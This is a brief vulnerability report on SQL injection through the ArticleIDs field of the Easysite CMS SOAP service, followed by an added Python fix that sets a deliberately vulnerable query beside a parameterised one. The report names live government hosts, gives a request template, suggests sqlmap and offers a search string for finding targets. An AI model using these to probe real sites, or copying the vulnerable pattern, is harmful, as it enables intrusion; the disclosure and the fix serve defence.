Easysite content management system: a simple and crude SQL injection
Web services will not lie to anyone ~!
A large number of gov sites use the easysite content management system.
Detailed description:
1. SOAP injection
Easysite webservice file:
http://www.py.gov.cn/DesktopModules/C_Info/WebService/C_InfoService.asmx
2. The ArticleIDs parameter is vulnerable to SQL injection.
Run it in sqlmap.

POST /DesktopModules/C_Info/WebService/C_InfoService.asmx HTTP/1.1
Host: dynamic.xmedu.gov.cn
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/GetArticleHitsArray"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetArticleHitsArray xmlns="http://tempuri.org/">
      <ArticleIDs>string</ArticleIDs>
    </GetArticleHitsArray>
  </soap:Body>
</soap:Envelope>

Proof of vulnerability:
If you don't know who is using Easysite, Google (if you can open it) will tell you:
Inurl: asmx comment topmodules
(N domain names of the General Administration of Customs are all in this system)
Solution:
GOV websites do not require RANK. Do not cross-province websites.
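
One way to close the ArticleIDs hole, shown as an added example that is not Easysite's code and not part of the original report. It assumes (the page does not show the server side) that the service pastes the comma-separated ArticleIDs string into an IN (...) clause; the articles table, its columns and every function name are hypothetical, and SQLite stands in for the real database.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET

NS = {"soap": "http://schemas.xmlsoap.org/soap/envelope/", "t": "http://tempuri.org/"}
ID_LIST = re.compile(r"[0-9]{1,9}(,[0-9]{1,9})*")  # ASCII digits and commas only
MAX_IDS = 100                                      # cap the size of the IN list

# Constructed sample request, same shape as the GetArticleHitsArray envelope above.
SAMPLE = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><GetArticleHitsArray xmlns="http://tempuri.org/">
<ArticleIDs>1,3</ArticleIDs></GetArticleHitsArray></soap:Body></soap:Envelope>"""

def extract_article_ids(envelope):
    """Return the raw ArticleIDs text from a SOAP request ('' if absent)."""
    root = ET.fromstring(envelope.encode("utf-8"))
    node = root.find("soap:Body/t:GetArticleHitsArray/t:ArticleIDs", NS)
    return (node.text or "") if node is not None else ""

def parse_ids(raw):
    """Allow-list check: accept only 'n,n,n' and return the ids as integers."""
    raw = raw.strip()
    if not ID_LIST.fullmatch(raw):
        raise ValueError("ArticleIDs must be comma-separated integers")
    ids = [int(part) for part in raw.split(",")]
    if len(ids) > MAX_IDS:
        raise ValueError("too many ArticleIDs")
    return ids

def hits_vulnerable(db, raw):
    # Assumed shape of the flaw: request text becomes part of the SQL statement.
    return db.execute(f"SELECT id, hits FROM articles WHERE id IN ({raw})").fetchall()

def hits_hardened(db, raw):
    # Validate first, then bind every id as a parameter; only '?' marks are formatted in.
    ids = parse_ids(raw)
    marks = ",".join("?" * len(ids))
    sql = f"SELECT id, hits FROM articles WHERE id IN ({marks}) ORDER BY id"
    return db.execute(sql, ids).fetchall()

def demo_db():
    """In-memory table with three constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, hits INTEGER)")
    db.executemany("INSERT INTO articles VALUES (?, ?)", [(1, 10), (2, 20), (3, 30)])
    return db

if __name__ == "__main__":
    print(hits_hardened(demo_db(), extract_article_ids(SAMPLE)))
```

On ASP.NET the same two steps apply: reject anything that is not a list of integers, then pass each id as a typed command parameter instead of building the SQL text from the request.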